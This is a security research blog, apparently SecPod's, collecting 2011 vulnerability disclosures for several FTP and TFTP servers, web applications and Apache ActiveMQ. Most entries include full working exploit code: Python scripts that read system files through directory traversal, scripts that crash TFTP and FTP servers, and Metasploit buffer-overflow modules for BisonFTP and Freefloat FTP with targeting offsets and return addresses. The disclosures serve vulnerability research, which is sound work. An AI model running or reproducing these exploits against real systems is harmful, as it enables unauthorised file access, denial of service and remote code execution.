SecPod Research Blog

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found Multiple Cross Site Scripting Vulnerabilities in GoAhead WebServer. The vulnerability is caused by improper validation of input to ‘name’ & ‘address’ parameters in /goform/formTest page. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 length leads to crash
exploit = "\x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"

## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.

##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the BisonFTP Server <= v3.5 .
			},
			'Author'         =>
				[
					'localh0t',		# Initial PoC
					'veerendragg @ SecPod',	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'BID', '49109'],
					[ 'CVE', '1999-1510'],
					[ 'URL', 'http://secpod.org/blog/?p=384'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17649'],
					[ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 388,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x0040333f, # call edx from Bisonftp.exe
							'Offset' => 1432
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
		sploit = rand_text_alpha(1028)					## Random Buffer
		sploit << "\x90" * 16						## Padding
		sploit << payload.encoded					## Encoded Payload
		sploit << "\x90" * (388 - payload.encoded.length)		## More Nops
		sploit << [target.ret].pack('V')				## Return Address
		sploit << rand_text_alpha(39)					## More Buffer

		print_status("Sending payload...")
		sock.put(sploit)

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit : Download here.

##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Freefloat FTP Server APPE Command Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the APPE command in the Freefloat FTP server.
			},
			'Author'         =>
				[
					'veerendragg @ SecPod',	# Initial Discovery
					'veerendragg @ SecPod'	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'URL', 'http://secpod.org/blog/?p=310' ],
					[ 'URL', 'http://secpod.org/blog/?p=353' ],
					[ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
					[ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 500,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x7e429353, # jmp esp from user32.dll
							'Offset' => 246
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect_login
		print_status("Trying target #{target.name}...")
		buf = make_nops(target['Offset'])
		buf << [target.ret].pack('V')
		buf << make_nops(30)
		buf << payload.encoded

		print_status("Sending exploit buffer...")
		send_cmd( ['APPE', buf] , false )

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

SecPod Research Team member (Antu Sanadi) has found Multiple Vulnerabilities in Xataface WebAuction and Xataface Librarian DB. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

SecPod Research Team member (Sooraj K.S) has found Multiple XSS and SQL Injection Vulnerabilities in MYRE Real Estate Software. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

SecPod Research Team member (Veerendra G.G) has found information disclosure vulnerability in Apache ActiveMQ. The flaws are caused due to input validation errors while processing URL, which can be exploited to view the source code of a visited page and leads to further attacks.

More information on the flaws can be found here.

SecPod Research Team member (Veerendra G.G) has found multiple Buffer Overflow vulnerabilities in Freefloat FTP Server. The flaws are caused due to input validation errors while processing DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. The buffer is overflown by sending overly long command arguments, which can be exploited to execute arbitrary code or crash a vulnerable server denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : http://secpod.org/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

SecPod Research Team member (Antu Sanadi) has found a Directory Traversal vulnerability in CiscoKits CCNA TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : CiscoKits TFTP Server Directory Traversal Vulnerability
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory  : http://secpod.org/blog/?p=301
#             http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
#             http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt
# Version   : CiscoKits CCNA TFTP Server 1.0.0.0
# Date      : 21/07/2011
##############################################################################
import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                        ## The Server IP
    PORT = 69                                 ## Default TFTP port

    data = "\x00\x01"                         ## TFTP Read Request
    data += "../" * 10 + "windows/win.ini" + "\x00"  ## Read boot.ini file using directory traversal
    data += "netascii\x00"                    ## TFTP Type

    # netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team